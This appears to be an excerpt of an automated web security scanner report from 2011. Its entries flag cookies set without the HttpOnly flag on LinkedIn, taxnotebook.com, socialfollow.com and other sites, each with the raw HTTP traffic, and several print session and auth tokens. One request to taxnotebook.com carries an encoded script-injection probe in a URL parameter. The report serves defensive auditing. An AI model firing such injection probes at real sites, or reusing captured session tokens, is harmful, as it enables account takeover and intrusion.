User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; __utmz=23068709.1303163602.1.1.utmcsr=rockyou.com|utmccn=(referral)|utmcmd=referral|utmcct=/rymini/; __qca=P0-87169230-1303163602430; bcookie="v=1&4d9675db-dcd4-4b34-bfd9-5f98cf2c89da"; __utma=23068709.2028061763.1303163602.1303561523.1304000549.4; __utmv=23068709.guest

Response

HTTP/1.0 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: _lipt=deleteMe; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:1022634729605892638"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:9ALnYa_o7w0-_aDZAiRhif6cnHkmMFvo5bAux56op-0wmSGoVi5tpl:1304703510:a79f22fd5b55c77016e1e883ba6f2782d2bb74f6"; Version=1; Max-Age=1799; Expires=Fri, 06-May-2011 18:08:29 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Location: http://www.linkedin.com/pub/social-follow/12/7a2/294
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 06 May 2011 17:38:29 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close

18.98. http://www.linkedin.com/pub/social-follow/12/7a2/294  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /pub/social-follow/12/7a2/294

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pub/social-follow/12/7a2/294 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; __utmz=23068709.1303163602.1.1.utmcsr=rockyou.com|utmccn=(referral)|utmcmd=referral|utmcct=/rymini/; __qca=P0-87169230-1303163602430; bcookie="v=1&4d9675db-dcd4-4b34-bfd9-5f98cf2c89da"; __utma=23068709.2028061763.1303163602.1303561523.1304000549.4; __utmv=23068709.guest; JSESSIONID="ajax:1022634729605892638"; leo_auth_token="GST:9ALnYa_o7w0-_aDZAiRhif6cnHkmMFvo5bAux56op-0wmSGoVi5tpl:1304703510:a79f22fd5b55c77016e1e883ba6f2782d2bb74f6"; lang="v=2&lang=en"

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _lipt=deleteMe; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:9ALnYa_o7w0-_aDZAiRhif6cnHkmMFvo5bAux56op-0wmSGoVi5tpl:1304703833:12ab3b2206f30def848810f18bb65505a76b5904"; Version=1; Max-Age=1799; Expires=Fri, 06-May-2011 18:13:52 GMT; Path=/
Vary: Accept-Encoding
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Last-Modified: Thu, 09 Apr 2009 03:12:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Fri, 06 May 2011 17:43:53 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: keep-alive
Content-Length: 26636

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta name="descr
...[SNIP]...
18.99. http://www.neospire.net/security-and-compliance/PCI-DSS.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.neospire.net
Path:   /security-and-compliance/PCI-DSS.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security-and-compliance/PCI-DSS.php?utm_source=Google&utm_medium=ppc&utm_campaign=pci-magic&utm_keyword=%252BPCI%2520%252Bcompliance&gclid=CIbrp9zV1KgCFd8D5QodQ0sogw HTTP/1.1
Host: www.neospire.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:22:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=6083a42a7356a1bdbe27f3e50b8622e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 81911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
18.100. http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.networksolutions.com
Path:   /legal/SSL-legal-repository-rpg.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /legal/SSL-legal-repository-rpg.jsp HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 07 May 2011 01:16:25 GMT
Set-cookie: JSESSIONID=806e2d4caa6cc054763194e76a0a; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
X-powered-by: Servlet/2.5
Set-cookie: JROUTE=8y5l; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-cookie: vrsnsf=806e2d4caa6cc054763194e76a0a; Expires=Thu, 25-May-2079 04:30:31 GMT; Path=/
Set-cookie: siteId=46064838-12; Expires=Tue, 01-May-2012 01:16:25 GMT; Path=/
Content-type: text/html;charset=UTF-8
Date: Sat, 07 May 2011 01:16:25 GMT
Vary: accept-encoding
Content-Length: 44952

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<head>
<title>Legal | Network Solutions</title>
<meta http-equiv="content-type" conte
...[SNIP]...
18.101. http://www.nextadvisor.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303691684.4.3.utmgclid=CKvepPW1tqgCFctw5QodwGjRAw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303677881.1303691684.4

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 21:40:00 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=49e74ffb182de820630991c604ed5148; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
18.102. http://www.socialfollow.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:36 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=a66e1734b752a527fe65db3fafc4b523; expires=Fri, 06 May 2011 19:37:36 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7330
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
18.103. http://www.socialfollow.com/blog/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /blog/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog/ HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.3.10.1304721456

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:39:52 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://www.socialfollow.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=f9e5973c7ff9e78b9f821853443b2eb5; expires=Fri, 06 May 2011 19:39:55 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 96431


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...
18.104. http://www.socialfollow.com/login.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /login.php HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
Cache-Control: max-age=0
Origin: http://www.socialfollow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.1.10.1304721456
Content-Length: 31

tEmail=Email&pPassword=Password

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:53 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=71434cdaab7d48ca4d16e33577c1485b; expires=Fri, 06 May 2011 19:37:53 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4494
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
18.105. https://www.taxnotebook.com/Login/PopupMessage.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.taxnotebook.com
Path:   /Login/PopupMessage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Login/PopupMessage.aspx?usr=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000341)%3C/script%3E HTTP/1.1
Host: www.taxnotebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:49:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: SessionStateGUID=6faf2a0c-e41b-6cdb-5915-512ec79c7b90; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 6653

<img src='../images/tnlogo.gif' width='96' height='23'>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Tax Notebook</title>
       <LINK href="../Main.css" typ
...[SNIP]...
18.106. https://www.taxnotebook.com/Login/TNLogin.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.taxnotebook.com
Path:   /Login/TNLogin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Login/TNLogin.aspx HTTP/1.1
Host: www.taxnotebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refaccno=759456; ASPSESSIONIDAABTDSBD=FMKFIPIDJPCACPMKKHGMNJHE

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: SessionStateGUID=819ade93-ce22-7d31-b53b-15e41cb9a483; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 10347

<img src='../images/tnlogo.gif' width='96' height='23'>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Tax Notebook</title>
       <link href="../Main.css" typ
...[SNIP]...
18.107. https://www.taxnotebook.com/tnstart.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.taxnotebook.com
Path:   /tnstart.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tnstart.asp?welcome=PA7594560 HTTP/1.1
Host: www.taxnotebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Sat, 07 May 2011 01:44:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: Login/TNLogin.aspx
Content-Length: 139
Content-Type: text/html
Set-Cookie: refaccno=759456; path=/
Set-Cookie: ASPSESSIONIDCSTDRTTC=HAGFLEACNJKIJHHDDPDCFBCH; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="Login/TNLogin.aspx">here</a>.</body>
18.108. http://www.trpcweb.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.trpcweb.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.trpcweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: store, no-cache, must-revalidate,post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 07 May 2011 01:37:01 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.14
Set-Cookie: SESS965ff70c2c03801782546f5ffae8476c=1jkd7qgqokj3oj4tbtt6tsoik3; expires=Mon, 30-May-2011 05:10:21 GMT; path=/; domain=.trpcweb.com
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:37:02 GMT
Content-Length: 33980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta
...[SNIP]...
18.109. http://www.trust-guard.com/compare-Trust-Seals-s/1.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.trust-guard.com
Path:   /compare-Trust-Seals-s/1.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /compare-Trust-Seals-s/1.htm HTTP/1.1
Host: www.trust-guard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2

Response

HTTP/1.1 302 Found
Date: Sat, 07 May 2011 00:49:33 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=9t7seirvsb0c34pngfqn7mcun3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://www.trust-guard.com/compare-Trust-Seals-s/1.htm
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 114061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>Trust Seals from Trust Guard - Improve O
...[SNIP]...
18.110. http://www.visitor-track.com/admin/loghit.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.visitor-track.com
Path:   /admin/loghit.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /admin/loghit.asp?id=105539&rp=&sw=1920&sh=1200&pa=http%3A//www.neospire.net/security-and-compliance/PCI-DSS.php%3Futm_source%3DGoogle%26utm_medium%3Dppc%26utm_campaign%3Dpci-magic%26utm_keyword%3D%25252BPCI%252520%25252Bcompliance%26gclid%3DCIbrp9zV1KgCFd8D5QodQ0sogw&bn=Netscape%20v5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/534.24%20%28KHTML%2C%20like%20Gecko%29%20Chrome/11.0.696.60%20Safari/534.24&tz=5&vr=3 HTTP/1.1
Host: www.visitor-track.com
Proxy-Connection: keep-alive
Referer: http://www.neospire.net/security-and-compliance/PCI-DSS.php?utm_source=Google&utm_medium=ppc&utm_campaign=pci-magic&utm_keyword=%252BPCI%2520%252Bcompliance&gclid=CIbrp9zV1KgCFd8D5QodQ0sogw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cke10349=5%2F4%2F2011+2%3A35%3A39+PM

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:23:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
Content-Length: 43
Content-Type: image/gif
Expires: Sat, 07 May 2011 01:23:05 GMT
Set-Cookie: cke105539=5%2F6%2F2011+9%3A23%3A05+PM; expires=Sat, 07-May-2016 01:23:04 GMT; path=/
Set-Cookie: ASPSESSIONIDSAARQTRR=MODPNHACCJPFNNFNDFOPJKNE; path=/
Cache-control: private

GIF89a.............!.......,...........D..;
18.111. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=185942&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; 